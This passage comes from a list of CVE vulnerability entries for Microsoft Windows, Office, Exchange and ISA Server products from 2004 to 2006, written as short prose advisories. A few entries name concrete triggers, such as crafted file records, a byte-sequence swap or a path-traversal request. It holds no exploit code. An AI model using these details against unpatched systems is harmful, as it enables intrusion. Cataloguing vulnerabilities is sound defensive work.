and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing. [CVE-2006-2378] Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption. [CVE-2006-2374] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to cause a denial of service (hang) by calling the MrxSmbCscIoctlCloseForCopyChunk with the file handle of the shadow device, which results in a deadlock, aka the "SMB Invalid Handle Vulnerability." [CVE-2006-2373] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability." [CVE-2006-2372] Buffer overflow in the DHCP Client service for Microsoft Windows 2000 SP4, Windows XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a crafted DHCP response. [CVE-2006-2371] Buffer overflow in the Remote Access Connection Manager service (RASMAN) service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," that lead to registry corruption and stack corruption, aka the "RASMAN Registry Corruption Vulnerability." [CVE-2006-2370] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability." [CVE-2006-2334] The RtlDosPathNameToNtPathName_U API function in NTDLL.DLL in Microsoft Windows 2000 SP4 and XP SP2 does not properly convert DOS style paths with trailing spaces into NT style paths, which allows context-dependent attackers to create files that cannot be accessed through the expected DOS path or prevent access to other similarly named files in the same directory, which prevents those files from being detected or disinfected by certain anti-virus and anti-spyware software. [CVE-2006-2094] Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control. [CVE-2006-2055] Argument injection vulnerability in Microsoft Outlook 2003 SP1 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1654] Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. [CVE-2006-1651] DISPUTED Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol." [CVE-2006-1540] MSO.DLL in Microsoft Office 2000, Office XP (2002), and Office 2003 allows user-assisted attackers to cause a denial of service and execute arbitrary code via multiple attack vectors, as originally demonstrated using a crafted document record with a malformed string, as demonstrated by replacing a certain "01 00 00 00" byte sequence with an "FF FF FF FF" byte sequence, possibly causing an invalid array index, in (1) an Excel .xls document, which triggers an access violation in ole32.dll [CVE-2006-1316] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via an Office file with malformed string that triggers memory corruption related to record lengths, aka "Microsoft Office Parsing Vulnerability," a different vulnerability than CVE-2006-2389. [CVE-2006-1315] The Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to obtain sensitive information via crafted requests that leak information in SMB buffers, which are not properly initialized, aka "SMB Information Disclosure Vulnerability." [CVE-2006-1314] Heap-based buffer overflow in the Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to execute arbitrary code via crafted first-class Mailslot messages that triggers memory corruption and bypasses size restrictions on second-class Mailslot messages. [CVE-2006-1313] Microsoft JScript 5.1, 5.5, and 5.6 on Windows 2000 SP4, and 5.6 on Windows XP, Server 2003, Windows 98 and Windows Me, will "release objects early" in certain cases, which results in memory corruption and allows remote attackers to execute arbitrary code. [CVE-2006-1311] The RichEdit component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 [CVE-2006-1309] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted LABEL record that triggers memory corruption. [CVE-2006-1308] Unspecified vulnerability in Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted FNGROUPCOUNT value. [CVE-2006-1306] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted BIFF record with an attacker-controlled array index that is used for a function pointer, aka "Malformed OBJECT record Vulnerability." [CVE-2006-1305] Microsoft Outlook 2000, 2002, and 2003 allows user-assisted remote attackers to cause a denial of service (memory exhaustion and interrupted mail recovery) via malformed e-mail header information, possibly related to (1) long subject lines or (2) large numbers of recipients in To or CC headers. [CVE-2006-1304] Buffer overflow in Microsoft Excel 2000 through 2003 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted COLINFO record, which triggers the overflow during a "data filling operation." [CVE-2006-1302] Buffer overflow in Microsoft Excel 2000 through 2003 allows user-assisted attackers to execute arbitrary code via a .xls file with certain crafted fields in a SELECTION record, which triggers memory corruption, aka "Malformed SELECTION record Vulnerability." [CVE-2006-1301] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted SELECTION record that triggers memory corruption, a different vulnerability than CVE-2006-1302. [CVE-2006-1300] Microsoft .NET framework 2.0 (ASP.NET) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to bypass access restrictions via unspecified "URL paths" that can access Application Folder objects "explicitly by name." [CVE-2006-1257] The sample files in the authfiles directory in Microsoft Commerce Server 2002 before SP2 allow remote attackers to bypass authentication by logging in to authfiles/login.asp with a valid username and any password, then going to the main site twice. [CVE-2006-1193] Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing." [CVE-2006-1184] Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0, 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to cause a denial of service (crash) via a BuildContextW request with a large (1) UuidString or (2) GuidIn of a certain length, which causes an out-of-range memory access, aka the MSDTC Denial of Service Vulnerability. NOTE: this is a variant of CVE-2005-2119. [CVE-2006-0988] The default configuration of the DNS Server service on Windows Server 2003 and Windows 2000, and the Microsoft DNS Server service on Windows NT 4.0, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses. [CVE-2006-0935] Microsoft Word 2003 allows remote attackers to cause a denial of service (application crash) via a crafted file, as demonstrated by 101_filefuzz. [CVE-2006-0187] By design, Microsoft Visual Studio 2005 automatically executes code in the Load event of a user-defined control (UserControl1_Load function), which allows user-assisted attackers to execute arbitrary code by tricking the user into opening a malicious Visual Studio project file. [CVE-2006-0034] Heap-based buffer overflow in the CRpcIoManagerServer::BuildContext function in msdtcprx.dll for Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0 and Windows 2000 SP2 and SP3 allows remote attackers to execute arbitrary code via a long fifth argument to the BuildContextW or BuildContext opcode, which triggers a bug in the NdrAllocate function, aka the MSDTC Invalid Memory Access Vulnerability. [CVE-2006-0033] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via a crafted PNG image that triggers memory corruption when it is parsed. [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0031] Stack-based buffer overflow in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed record with a modified length value, which leads to memory corruption. [CVE-2006-0030] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed graphic, which leads to memory corruption. [CVE-2006-0029] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed description, which leads to memory corruption. [CVE-2006-0028] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via a BIFF parsing format file containing malformed BOOLERR records that lead to memory corruption, probably involving invalid pointers. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2006-0022] Unspecified vulnerability in Microsoft PowerPoint in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP1 and SP2, Office 2004 for Mac, and v. X for Mac allows user-assisted attackers to execute arbitrary code via a PowerPoint document with a malformed record, which triggers memory corruption. [CVE-2006-0021] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability." [CVE-2006-0020] An unspecified Microsoft WMF parsing application, as used in Internet Explorer 5.01 SP4 on Windows 2000 SP4, and 5.5 SP2 on Windows Millennium, and possibly other versions, allows attackers to cause a denial of service (crash) and possibly execute code via a crafted WMF file with a manipulated WMF header size, possibly involving an integer overflow, a different vulnerability than CVE-2005-4560, and aka "WMF Image Parsing Memory Corruption Vulnerability." [CVE-2006-0015] Cross-site scripting (XSS) vulnerability in _vti_bin/_vti_adm/fpadmdll.dll in Microsoft FrontPage Server Extensions 2002 and SharePoint Team Services allows remote attackers to inject arbitrary web script or HTML, then leverage the attack to execute arbitrary programs or create new accounts, via the (1) operation, (2) command, and (3) name parameters. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2006-0012] Unspecified vulnerability in Windows Explorer in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via attack vectors involving COM objects and "crafted files and directories," aka the "Windows Shell Vulnerability." [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2006-0009] Buffer overflow in Microsoft Office 2000 SP3, XP SP3, and other versions and packages, allows user-assisted attackers to execute arbitrary code via a routing slip that is longer than specified by the provided length field, as exploited by malware such as TROJ_MDROPPER.BH and Trojan.PPDropper.E in attacks against PowerPoint. [CVE-2006-0008] The ShellAbout API call in Korean Input Method Editor (IME) in Korean versions of Microsoft Windows XP SP1 and SP2, Windows Server 2003 up to SP1, and Office 2003, allows local users to gain privileges by launching the "shell about dialog box" and clicking the "End-User License Agreement" link, which executes Notepad with the privileges of the program that displays the about box. [CVE-2006-0007] Buffer overflow in GIFIMP32.FLT, as used in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via a crafted GIF image that triggers memory corruption when it is parsed. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0004] Microsoft PowerPoint 2000 in Office 2000 SP3 has an interaction with Internet Explorer that allows remote attackers to obtain sensitive information via a PowerPoint presentation that attempts to access objects in the Temporary Internet Files Folder (TIFF). [CVE-2006-0002] Unspecified vulnerability in Microsoft Outlook 2000 through 2003, Exchange 5.0 Server SP2 and 5.5 SP4, Exchange 2000 SP3, and Office allows remote attackers to execute arbitrary code via an e-mail message with a crafted Transport Neutral Encapsulation Format (TNEF) MIME attachment, related to message length validation. [CVE-2006-0001] Stack-based buffer overflow in Microsoft Publisher 2000 through 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted PUB file, which causes an overflow when parsing fonts. [CVE-2005-4717] Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service (client crash) via a certain combination of a malformed HTML file and a CSS file that triggers a null dereference, probably related to rendering of a DIV element that contains a malformed IMG tag, as demonstrated by IEcrash.htm and IEcrash.rar. [CVE-2005-4269] mshtml.dll in Microsoft Windows XP, Server 2003, and Internet Explorer 6.0 SP1 allows attackers to cause a denial of service (access violation) by causing mshtml.dll to process button-focus events at the same time that a document is reloading, as seen in Microsoft Office InfoPath 2003 by repeatedly clicking the "Delete" button in a repeating section in a form. NOTE: the normal operation of InfoPath appears to involve a local user without any privilege boundaries, so this might not be a vulnerability in InfoPath. If no realistic scenarios exist for this problem in other products, then perhaps it should be excluded from CVE. [CVE-2005-4131] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed range, which could lead to memory corruption involving an argument to the msvcrt.memmove function, aka "Brand new Microsoft Excel Vulnerability," as originally placed for sale on eBay as item number 7203336538. [CVE-2005-3981] DISPUTED NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE. [CVE-2005-3945] The SynAttackProtect protection in Microsoft Windows 2003 before SP1 and Windows 2000 before SP4 with Update Roll-up uses a hash of predictable data, which allows remote attackers to cause a denial of service (CPU consumption) via a flood of SYN packets that produce identical hash values, which slows down the hash table lookups. [CVE-2005-3644] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120. [CVE-2005-3177] CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions, which could cause ACLs for some files to be reverted to less secure defaults, or cause security descriptors to be removed. [CVE-2005-3176] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not record the IP address of a Windows Terminal Services client in a security log event if the client connects successfully, which could make it easier for attackers to escape detection. [CVE-2005-3175] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows a local administrator to unlock a computer even if it has been locked by a domain administrator, which allows the local administrator to access the session as the domain administrator. [CVE-2005-3174] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows users to log on to the domain, even when their password has expired, if the fully qualified domain name (FQDN) is 8 characters long. [CVE-2005-3173] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not apply group policies if the user logs on using UPN credentials with a trailing dot, which prevents Windows 2000 from finding the correct domain controller and could allow the user to bypass intended restrictions. [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-3170] The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-3168] The SECEDIT command on Microsoft Windows 2000 before Update Rollup 1 for SP4, when using a security template to set Access Control Lists (ACLs) on folders, does not apply ACLs on folders that are listed after a long folder entry, which could result in less secure permissions than specified by the template. [CVE-2005-2122] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to execute arbitrary commands via a shortcut (.lnk) file with long font properties that lead to a buffer overflow in the Client/Server Runtime Server Subsystem (CSRSS), a different vulnerability than CVE-2005-2118. [CVE-2005-2120] Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call. [CVE-2005-2118] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote user-assisted attackers to execute arbitrary commands via a crafted shortcut (.lnk) file with long font properties that lead to a buffer overflow when the user views the file's properties using Windows Explorer, a different vulnerability than CVE-2005-2122. [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-1985] The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages. [CVE-2005-1984] Buffer overflow in the Print Spooler service (Spoolsv.exe) for Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via a malicious message. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1982] Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used. [CVE-2005-1981] Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message. [CVE-2005-1907] The ISA Firewall service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (Wspsrv.exe crash) via a large amount of SecureNAT network traffic. [CVE-2005-1683] Buffer overflow in winword.exe 10.2627.6714 and earlier in Microsoft Word for the Macintosh, before SP3 for Word 2002, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted mcw file. [CVE-2005-1218] The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests. [CVE-2005-1216] Microsoft ISA Server 2000 allows remote attackers to connect to services utilizing the NetBIOS protocol via a NetBIOS connection with an ISA Server that uses the NetBIOS (all) predefined packet filter. [CVE-2005-1215] Microsoft ISA Server 2000 allows remote attackers to poison the ISA cache or bypass content restriction policies via a malformed HTTP request packet containing multiple Content-Length headers. [CVE-2005-1208] Integer overflow in Microsoft Windows 98, 2000, XP SP2 and earlier, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via a crafted compiled Help (.CHM) file with a large size field that triggers a heap-based buffer overflow, as demonstrated using a "ms-its:" URL in Internet Explorer. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1206] Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability." [CVE-2005-1205] The Telnet client for Microsoft Windows XP, Windows Server 2003, and Windows Services for UNIX allows remote attackers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command. [CVE-2005-1052] Microsoft Outlook 2003 and Outlook Web Access (OWA) 2003 do not properly display comma separated addresses in the From field in an e-mail message, which could allow remote attackers to spoof e-mail addresses. [CVE-2005-0921] Microsoft Outlook 2002 Connector for IBM Lotus Domino 2.0 allows local users to save passwords and login credentials locally, even when password caching is disabled by a group policy. [CVE-2005-0820] Microsoft Office InfoPath 2003 SP1 includes sensitive information in the Manifest.xsf file in a custom .xsn form, which allows attackers to obtain printer and network information, obtain the database name, username, and password, or obtain the internal web server name. [CVE-2005-0738] Stack consumption vulnerability in Microsoft Exchange Server 2003 SP1 allows users to cause a denial of service (hang) by deleting or moving a folder with deeply nested subfolders, which causes Microsoft Exchange Information Store service (Store.exe) to hang as a result of a large number of recursive calls. [CVE-2005-0564] Stack-based buffer overflow in Microsoft Word 2000 and Word 2002, and Microsoft Works Suites 2000 through 2004, might allow remote attackers to execute arbitrary code via a .doc file with long font information. [CVE-2005-0558] Buffer overflow in Microsoft Word 2000, Word 2002, and Word 2003 allows remote attackers to execute arbitrary code via a crafted document. [CVE-2005-0551] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value. [CVE-2005-0550] Buffer overflow in Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to cause a denial of service (i.e., system crash) via a malformed request, aka "Object Management Vulnerability". [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2005-0063] The document processing application used by the Windows Shell in Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by modifying the CLSID stored in a file so that it is processed by HTML Application Host (MSHTA), as demonstrated using a Microsoft Word document. [CVE-2005-0061] The kernel of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via certain access requests. [CVE-2005-0060] Buffer overflow in the font processing component of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application. [CVE-2005-0059] Buffer overflow in the Message Queuing component of Microsoft Windows 2000 and Windows XP SP1 allows remote attackers to execute arbitrary code via a crafted message. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers elevate privileges or execute arbitrary code via a crafted message. [CVE-2005-0048] Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability." [CVE-2004-2527] The local and remote desktop login screens in Microsoft Windows XP before SP2 and 2003 allow remote attackers to cause a denial of service (CPU and memory consumption) by repeatedly using the WinKey+"U" key combination, which causes multiple copies of Windows Utility Manager to be loaded more quickly than they can be closed when the copies detect that another instance is running. [CVE-2004-2482] Microsoft Outlook 2000 and 2003, when configured to use Microsoft Word 2000 or 2003 as the e-mail editor and when forwarding e-mail, does not properly handle an opening OBJECT tag that does not have a closing OBJECT tag, which causes Outlook to automatically download the URI in the data property of the OBJECT tag and might allow remote attackers to execute arbitrary code. [CVE-2004-2365] Memory leak in Microsoft Windows XP and Windows Server 2003 allows local users to cause a denial of service (memory exhaustion) by repeatedly creating and deleting directories using a non-standard tool such as smbmount. [CVE-2004-2339] DISPUTED Microsoft Windows 2000, XP, and possibly 2003 allows local users with the SeDebugPrivilege privilege to execute arbitrary code as kernel and read or write kernel memory via the NtSystemDebugControl function, which does not verify its pointer arguments. Note: this issue has been disputed, since Administrator privileges are typically required to exploit this issue, thus privilege boundaries are not crossed. [CVE-2004-1080] The WINS service (wins.exe) on Microsoft Windows NT Server 4.0, Windows 2000 Server, and Windows Server 2003 allows remote attackers to write to arbitrary memory locations and possibly execute arbitrary code via a modified memory pointer in a WINS replication packet to TCP port 42, aka the "Association Context Vulnerability." [CVE-2004-0963] Buffer overflow in Microsoft Word 2002 (10.6612.6714) SP3, and possibly other versions, allows remote attackers to cause a denial of service (application exception) and possibly execute arbitrary code in winword.exe via certain unexpected values in a .doc file, including (1) an offset that triggers an out-of-bounds memory access, (2) a certain value that causes a large memory copy as triggered by an integer conversion error, and other values. [CVE-2004-0897] The Indexing Service for Microsoft Windows XP and Server 2003 does not properly validate the length of a message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2004-0892] Microsoft Proxy Server 2.0 and Microsoft ISA Server 2000 (which is included in Small Business Server 2000 and Small Business Server 2003 Premium Edition) allows remote attackers to spoof trusted Internet content on a specially crafted webpage via spoofed reverse DNS lookup results. [CVE-2004-0846] Unknown vulnerability in Microsoft Excel 2000, 2002, 2001 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via a malicious file containing certain parameters that are not properly validated. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. [CVE-2004-0728] The Remote Control Client service in Microsoft's Systems Management Server (SMS) 2.50.2726.0 allows remote attackers to cause a denial of service (crash) via a data packet to TCP port 2702 that causes the server to read or write to an invalid memory address. [CVE-2004-0726] The Windows Media Player control in Microsoft Windows 2000 allows remote attackers to execute arbitrary script in the local computer zone via an ASX filename that contains javascript, which is executed in the local context in a preview panel. [CVE-2004-0575] Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation. [CVE-2004-0574] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows. [CVE-2004-0573] Buffer overflow in the converter for Microsoft WordPerfect 5.x on Office 2000, Office XP, Office 2003, and Works Suites 2001 through 2004 allows remote attackers to execute arbitrary code via a malicious document or website. [CVE-2004-0540] Microsoft Windows 2000, when running in a domain whose Fully Qualified Domain Name (FQDN) is exactly 8 characters long, does not prevent users with expired passwords from logging on to the domain. [CVE-2004-0503] Microsoft Outlook 2003 allows remote attackers to bypass the default zone restrictions and execute script within media files via a Rich Text Format (RTF) message containing an OLE object for the Windows Media Player, which bypasses Media Player's setting to disallow scripting and may lead to unprompted installation of an executable when exploited in conjunction with predictable-file-location exposures such as CVE-2004-0502. [CVE-2004-0379] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft SharePoint Portal Server 2001 allow remote attackers to process arbitrary web content and steal cookies via certain server scripts. [CVE-2004-0284] Microsoft Internet Explorer 6.0, Outlook 2002, and Outlook 2003 allow remote attackers to cause a denial of service (CPU consumption), if "Do not save encrypted pages to disk" is disabled, via a web site or HTML e-mail that contains two null characters (%00) after the host name. [CVE-2004-0214] Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba. [CVE-2004-0211] The kernel for Microsoft Windows Server 2003 does not reset certain values in CPU data structures, which allows local users to cause a denial of service (system crash) via a malicious program. [CVE-2004-0210] The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow. [CVE-2004-0209] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) 